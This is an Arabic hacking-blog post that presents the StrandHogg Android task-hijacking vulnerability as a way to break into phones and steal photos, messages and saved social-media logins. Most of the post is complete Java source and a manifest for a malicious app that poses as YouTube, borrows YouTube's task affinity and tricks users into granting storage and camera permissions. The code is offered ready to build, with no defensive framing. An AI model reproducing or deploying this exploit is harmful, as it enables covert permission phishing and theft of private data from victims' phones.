السلام عليكم متابعين قناة ومدونة شادو هكر في هذا المقال اقدم لكم ثغرة Strandhogg المعروفة التي تمكنك من اختراق هواتف الأندرويد والووصول الى الصور والرسائل النصيه وحتى تخطي حسابات مواقع التواصل الأجتماعي المحفوظة في الهاتف وتعتبر ثغرة Strandhogg خطيرة جداً لما لها من صلاحيات قوية في اختراق وسرقة بيانات الهاتف
ثغرة Strandhogg للأندرويد
إنشاء Class بأسم phishingAttack
package strandhogg.test;import android.Manifest;import android.app.Activity;import android.content.Context;import android.content.Intent;import android.content.pm.PackageManager;import android.os.Build;/*created by scream*/@SuppressWarnings("all")public final class phishingAttack {public static final String targetPackageName = "com.google.android.youtube";public static final String TAG = "scream\t";public static final int requestCode = 1;private static final int FLAGS_SINGLE_TOP = Intent.FLAG_ACTIVITY_CLEAR_TOP | Intent.FLAG_ACTIVITY_SINGLE_TOP;private static final int FLAGS_NEW_TASK = Intent.FLAG_ACTIVITY_CLEAR_TASK | Intent.FLAG_ACTIVITY_NEW_TASK;public static final String[] permissions = {Manifest.permission.READ_EXTERNAL_STORAGE,Manifest.permission.WRITE_EXTERNAL_STORAGE,Manifest.permission.CAMERA};public static void exploit(Context context , Activity activity , Class<?> targetActivityClass){if(!phishingAttack.isGranted(activity)){activity.startActivities(new Intent[]{new Intent(context,targetActivityClass).addFlags(FLAGS_SINGLE_TOP),new Intent(context,targetActivityClass).addFlags(FLAGS_SINGLE_TOP)});}}public static void toHome(Context context ,Activity activity) {context.startActivity(new Intent(Intent.ACTION_MAIN).addCategory(Intent.CATEGORY_HOME).addFlags(FLAGS_NEW_TASK));activity.moveTaskToBack(true);}public static Intent getLaunchIntent(Context context ,String packageName) {return context.getPackageManager().getLaunchIntentForPackage(packageName);}public static Intent getIntent(Context context ,String packageName, int value) {return new Intent(phishingAttack.getLaunchIntent(context,packageName)).addFlags(FLAGS_NEW_TASK).putExtra(TAG,value);}public static boolean isGranted(Activity activity){boolean granted = true;for (String permission: phishingAttack.permissions){if (activity.checkSelfPermission(permission) != PackageManager.PERMISSION_GRANTED){granted = false;break;}}return granted;}static void finish(Activity activity){if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP){activity.finishAndRemoveTask();}else{activity.finish();}}}
إنشاء Class بأسم activity
package strandhogg.test;
import android.app.Activity;
import android.content.Context;
import android.content.pm.PackageManager;
import android.os.Build;
import android.os.Bundle;
import androidx.core.app.ActivityCompat;
/*created by scream*/
public class activity extends Activity {
@Override
protected void onPause() {
super.onPause();
overridePendingTransition(0, 0);
}
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
ActivityCompat.requestPermissions(this, phishingAttack.permissions, phishingAttack.requestCode);
}
}
private void startActivity(Context context , int value){
startActivity(phishingAttack.getIntent(context,getPackageName(),value));
}
@Override
public void onRequestPermissionsResult(int code, String[] permissions, int[] grantResults) {
super.onRequestPermissionsResult(phishingAttack.requestCode, permissions, grantResults);
if (code == phishingAttack.requestCode) {
if (grantResults.length > 0){
Context context = getApplicationContext();
boolean granted = true;
for (int grantResult : grantResults) {
if (grantResult != PackageManager.PERMISSION_GRANTED) {
granted = false;
break;
}
}
if(granted){
phishingAttack.finish(this);
startActivity(context,1);
}else{
phishingAttack.finish(this);
startActivity(context,0);
android.os.Process.killProcess(android.os.Process.myPid());
}
}
}
}
}
وفي MainActivity Class
package strandhogg.test;
import android.app.Activity;
import android.content.Context;
import android.os.Bundle;
import android.widget.Toast;
/*created by scream*/
public class MainActivity extends Activity {
@Override
protected void onPause() {
super.onPause();
overridePendingTransition(0, 0);
}
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Context context = getApplicationContext();
int value = getValue(savedInstanceState,this);
if(value == 0){
if(!phishingAttack.isGranted(this)){
phishingAttack.finish(this);
phishingAttack.exploit(context,this, activity.class);
phishingAttack.toHome(context,this);
}else{
phishingAttack.finish(this);
phishingAttack.toHome(context,this);
successful();
}
}else if(value == 1){
phishingAttack.finish(this);
phishingAttack.toHome(context,this);
startActivity(phishingAttack.getIntent(context, phishingAttack.targetPackageName,-1));
successful();
}
}
private void successful(){
Toast.makeText(this,"successful", Toast.LENGTH_LONG).show();
System.out.println("Log++>" + "successful");
}
private int getValue(Bundle bundle, Activity activityView) {
int value = 0;
if (bundle == null) {
Bundle extras = activityView.getIntent().getExtras();
if(extras != null) {
Object obj = extras.get(phishingAttack.TAG);
if(obj != null){
value = (int) obj;
}
}
} else {
Object obj = bundle.get(phishingAttack.TAG);
if(obj != null){
value = (int) obj;
}
}
return value;
}
}
ال manifest
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
package="strandhogg.test">
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.CAMERA"/>
<application
android:allowBackup="true"
android:icon="@android:mipmap/sym_def_app_icon"
android:label="Youtube"
android:roundIcon="@android:mipmap/sym_def_app_icon"
android:supportsRtl="true"
android:theme="@android:style/Theme.InputMethod"
tools:ignore="AllowBackup">
<activity android:name=".MainActivity"
android:excludeFromRecents="true" >
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<activity
android:name="strandhogg.test.activity"
android:enabled="true"
android:exported="true"
android:excludeFromRecents="true"
android:launchMode="singleTask"
android:taskAffinity="com.google.android.youtube"
android:theme="@android:style/Theme.InputMethod"
/>
</application>
</manifest>